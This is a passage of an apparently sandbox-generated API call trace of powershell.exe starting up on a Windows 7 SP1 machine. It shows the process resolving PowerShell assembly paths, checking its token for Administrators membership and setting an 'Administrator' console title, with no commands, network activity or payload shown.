	[0640.177] CoTaskMemFree (pv=0x4e0f30) 
	[0640.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0643.169] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0643.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.170] CoTaskMemFree (pv=0x43e1c0) 
	[0652.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0652.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0656.136] CoTaskMemAlloc (cb=0x104) returned 0x43e2d0
	[0656.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e2d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.136] CoTaskMemFree (pv=0x43e2d0) 
	[0656.138] CoTaskMemAlloc (cb=0x104) returned 0x43e2d0
	[0656.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e2d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.138] CoTaskMemFree (pv=0x43e2d0) 
	[0657.674] CoTaskMemAlloc (cb=0x104) returned 0x43e2d0
	[0657.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e2d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.674] CoTaskMemFree (pv=0x43e2d0) 
	[0657.676] CoTaskMemAlloc (cb=0x104) returned 0x43e2d0
	[0657.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e2d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.676] CoTaskMemFree (pv=0x43e2d0) 
	[0657.677] CoTaskMemAlloc (cb=0x104) returned 0x43e2d0
	[0657.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e2d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.677] CoTaskMemFree (pv=0x43e2d0) 
	[0662.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0662.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0664.445] CoTaskMemAlloc (cb=0x104) returned 0x43e2d0
	[0664.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e2d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.445] CoTaskMemFree (pv=0x43e2d0) 
	[0664.447] CoTaskMemAlloc (cb=0x104) returned 0x43e2d0
	[0664.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e2d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.447] CoTaskMemFree (pv=0x43e2d0) 
	[0666.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0666.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0681.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0692.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0692.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0703.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0703.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0707.828] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0707.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0707.828] CoTaskMemFree (pv=0x43e4f0) 
	[0707.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0707.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0707.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0710.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x20d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0710.761] SetErrorMode (uMode=0x1) returned 0x1
	[0710.761] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x20da40 | out: lpFileInformation=0x20da40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0710.761] SetErrorMode (uMode=0x1) returned 0x1
	[0724.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0724.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0724.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0724.689] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0724.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.689] CoTaskMemFree (pv=0x43e4f0) 
	[0724.693] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0724.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.693] CoTaskMemFree (pv=0x43e4f0) 
	[0724.693] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0724.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.693] CoTaskMemFree (pv=0x43e4f0) 
	[0724.696] CoCreateGuid (in: pguid=0x20de08 | out: pguid=0x20de08*(Data1=0xc8e241d8, Data2=0x46cf, Data3=0x4885, Data4=([0]=0xb6, [1]=0xaf, [2]=0x34, [3]=0xaa, [4]=0xbd, [5]=0x53, [6]=0x91, [7]=0x2))) returned 0x0
	[0724.700] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0724.701] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.701] CoTaskMemFree (pv=0x43e4f0) 
	[0724.704] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0724.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.704] CoTaskMemFree (pv=0x43e4f0) 
	[0724.706] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0724.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.706] CoTaskMemFree (pv=0x43e4f0) 
	[0724.725] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0726.389] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x20dab0 | out: lpConsoleScreenBufferInfo=0x20dab0) returned 1
	[0726.410] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0726.411] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x20dab0 | out: lpConsoleScreenBufferInfo=0x20dab0) returned 1
	[0726.412] GetVersionExW (in: lpVersionInformation=0x20da40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20da40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0726.414] GetCurrentProcess () returned 0xffffffffffffffff
	[0726.415] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x20dad8 | out: TokenHandle=0x20dad8*=0x2f8) returned 1
	[0726.420] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20d9f8 | out: TokenInformation=0x0, ReturnLength=0x20d9f8) returned 0
	[0726.421] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4472e0
	[0726.421] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x4472e0, TokenInformationLength=0x4, ReturnLength=0x20d9f8 | out: TokenInformation=0x4472e0, ReturnLength=0x20d9f8) returned 1
	[0726.422] DuplicateTokenEx (in: hExistingToken=0x2f8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x20db58 | out: phNewToken=0x20db58*=0x300) returned 1
	[0726.423] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20d9f8 | out: TokenInformation=0x0, ReturnLength=0x20d9f8) returned 0
	[0726.423] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x447290
	[0726.423] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x447290, TokenInformationLength=0x4, ReturnLength=0x20d9f8 | out: TokenInformation=0x447290, ReturnLength=0x20d9f8) returned 1
	[0726.424] CheckTokenMembership (in: TokenHandle=0x300, SidToCheck=0x2c4aa70*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x20db68 | out: IsMember=0x20db68) returned 1
	[0726.424] CloseHandle (hObject=0x300) returned 1
	[0726.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0726.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0726.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0726.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0729.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0729.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0729.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0729.842] CoTaskMemAlloc (cb=0x804) returned 0x1b855080
	[0729.842] GetConsoleTitleW (in: lpConsoleTitle=0x1b855080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0729.843] CoTaskMemFree (pv=0x1b855080) 
	[0729.870] CoTaskMemAlloc (cb=0x804) returned 0x1b855930
	[0729.870] GetConsoleTitleW (in: lpConsoleTitle=0x1b855930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0731.744] CoTaskMemFree (pv=0x1b855930) 
	[0731.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.746] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0731.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0733.420] SetConsoleCtrlHandler (HandlerRoutine=0x2a8689c, Add=1) returned 1
	[0733.443] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0733.446] CoCreateGuid (in: pguid=0x20dc50 | out: pguid=0x20dc50*(Data1=0xa6ea4d96, Data2=0x5f4f, Data3=0x4d5a, Data4=([0]=0x93, [1]=0x13, [2]=0xb, [3]=0x29, [4]=0xc6, [5]=0x16, [6]=0x66, [7]=0x93))) returned 0x0
	[0733.447] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0733.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.447] CoTaskMemFree (pv=0x43e4f0) 
	[0734.672] WinSqmIsOptedIn () returned 0x0
	[0734.672] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.673] CoTaskMemFree (pv=0x43e4f0) 
	[0734.673] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.674] CoTaskMemFree (pv=0x43e4f0) 
	[0734.674] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.674] CoTaskMemFree (pv=0x43e4f0) 
	[0734.675] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.675] CoTaskMemFree (pv=0x43e4f0) 
